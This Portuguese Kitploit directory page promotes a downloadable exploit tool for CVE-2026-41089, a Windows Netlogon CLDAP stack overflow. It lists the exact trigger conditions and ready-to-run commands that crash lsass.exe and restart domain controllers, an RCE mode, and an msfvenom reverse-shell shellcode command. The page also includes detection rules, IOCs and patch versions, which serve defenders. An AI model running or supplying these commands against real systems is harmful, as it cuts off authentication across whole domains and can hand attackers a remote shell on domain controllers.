Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41089 — CVE-2026-41089 é uma vulnerabilidade crítica de execução remota de código no serviço Windows Netlogon, onde um único pacote pode derrubar o lsass.exe, fazendo com que o controlador de domínio reinicie em cerca de 30-60 segundos. Durante esse período, toda a autenticação de domínio desse DC falhará. | Kitploit
Ferramentas/GitHubGitHub/hnytgl/cve-2026-41089
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoFerramenta de Acesso RemotoExploração de Binários
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Ver Repositório
141214há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2026-41089 é uma vulnerabilidade crítica de execução remota de código no serviço Windows Netlogon, onde um único pacote pode derrubar o lsass.exe, fazendo com que o controlador de domínio reinicie em cerca de 30-60 segundos. Durante esse período, toda a autenticação de domínio desse DC falhará.

Compartilhar

CVE-2026-41089 — Exploração de Estouro de Buffer de Pilha CLDAP do Windows Netlogon RCE

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Crítico)
CWE: CWE-121 (Estouro de Buffer Baseado em Pilha)
Vetor de Ataque: UDP/389 (CLDAP SearchRequest)
Impacto: Execução Remota de Código (RCE) / Negação de Serviço (DoS)
Versões Afetadas: Windows Server 2012 R2 ~ 2025 (Controladores de Domínio)
Patch: Atualização Cumulativa de Maio de 2026

Visão Geral da Vulnerabilidade

A função NetpLogonPutUnicodeString em netlogon.dll possui uma vulnerabilidade de estouro de buffer de pilha ao processar solicitações de pesquisa CLDAP. A função recebe um orçamento de comprimento em bytes, mas o interpreta como uma contagem de WCHAR, resultando em uma gravação de 2 vezes o esperado.

O estouro ocorre em um buffer de pilha fixo de 528 bytes (264 ushort) na função NlGetLocalPingResponse. O campo User controlado pelo atacante, junto com o nome de domínio DNS do próprio servidor, preenchem este buffer, eventualmente sobrescrevendo o GS Security Cookie, resultando em e falha do .

__report_gsfailure
lsass.exe

Condições de Gatilho

  • NtVer=0x02 na Solicitação de Pesquisa CLDAP (força o uso do caminho antigo e vulnerável BuildSamLogonResponse)
  • Comprimento do campo User ≥ ~130 caracteres (limite binário de aproximadamente 260 bytes UTF-16)
  • Comprimento do nome de domínio DNS do servidor ≥ ~80 caracteres (quanto mais longo o domínio, mais fácil atingir o Cookie)

Nota: NtVer=0x16 (valor usado por muitos scripts de detecção públicos) aciona o caminho seguro BuildSamLogonResponseEx e não desencadeia a vulnerabilidade.

Funcionalidades

ModoDescrição
--mode dosEnvia pacotes CLDAP cuidadosamente construídos, causando falha do LSASS, reinicialização do DC (~60 segundos de interrupção de autenticação)
--mode rceTenta execução remota de código (nível de pesquisa, requer shellcode)
--mode scanEscaneia respostas para diferentes valores de NtVer, identifica a impressão digital do DC alvo
--mode autoDetecta automaticamente e seleciona a melhor estratégia de ataque

Modo DoS

Um único pacote pode travar lsass.exe, fazendo com que o controlador de domínio reinicie em cerca de 30-60 segundos. Durante este período, toda a autenticação de domínio neste DC falhará.

root@kitploit:~
# Basic usage — send 3 packets
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Single packet quick attack
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Aggressive mode — 5 packets concurrently
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Modo RCE

⚠️ Nível de pesquisa — Não confiável e instável em ambientes reais.

O RCE enfrenta os seguintes desafios:

  1. Os dados de estouro são o nome DNS do próprio servidor, não o shellcode do atacante
  2. O GS Cookie deve ser contornado (requer primitiva de vazamento de informações ou força bruta)
  3. CET/ACG/CFG no Server 2022+ tornam o ROP tradicional mais difícil
root@kitploit:~
# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Send RCE chain
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Modo de Escaneamento

root@kitploit:~
# Fingerprint the target DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Exemplo de saída esperada (alvo corrigido):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Exemplo de saída esperada (alvo não corrigido):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Se NtVer=0x02 expirar enquanto outras versões respondem normalmente, o alvo provavelmente está vulnerável.

Parâmetros Avançados

ParâmetroDescriçãoValor Padrão
-l, --user-lenComprimento do campo de nome de usuário (número de caracteres ASCII)180
--ntverValor NtVer (hexadecimal, ex. 0x02)0x02
--countNúmero de pacotes DoS a enviar3
--delayAtraso entre pacotes (segundos)0.5
-t, --timeoutTimeout do socket (segundos)5.0
--jsonSaída em formato JSON—
--rawImprimir o pacote bruto em hexadecimal antes de enviar—
--quietSuprimir saída de banner—
--shellcode-fileArquivo de shellcode personalizado (x64 raw)—
--lhostEndereço de escuta do reverse shell—
--lportPorta de escuta do reverse shell4444

Configuração do Ambiente de Teste

root@kitploit:~
# 在 Windows Server(未修补)上创建长域名 DC:
# 1. 提升为域控 (DNS 域名很长的域名,例如 "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. 确认已安装 2026 年 5 月之前的补丁
# 3. 从攻击机运行:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. 观察 DC 崩溃和重启

Indicadores de Comprometimento (IOCs)

Rede

  • Solicitação de Pesquisa CLDAP com User > 100 bytes e NtVer = 0x02 na porta UDP/389
  • Tráfego CLDAP anômalo de hosts que não são controladores de domínio para o DC

Host

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Regras de Detecção

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Informações do Patch

Versão do Windows ServerNúmero da Versão do PatchObservações
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Aviso Legal

Esta ferramenta destina-se apenas a avaliações de segurança autorizadas, testes de penetração, competições CTF e pesquisa defensiva. O uso desta ferramenta em qualquer sistema sem autorização por escrito explícita é ilegal. O usuário assume toda a responsabilidade legal.

Links de Referência

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Baixar ferramenta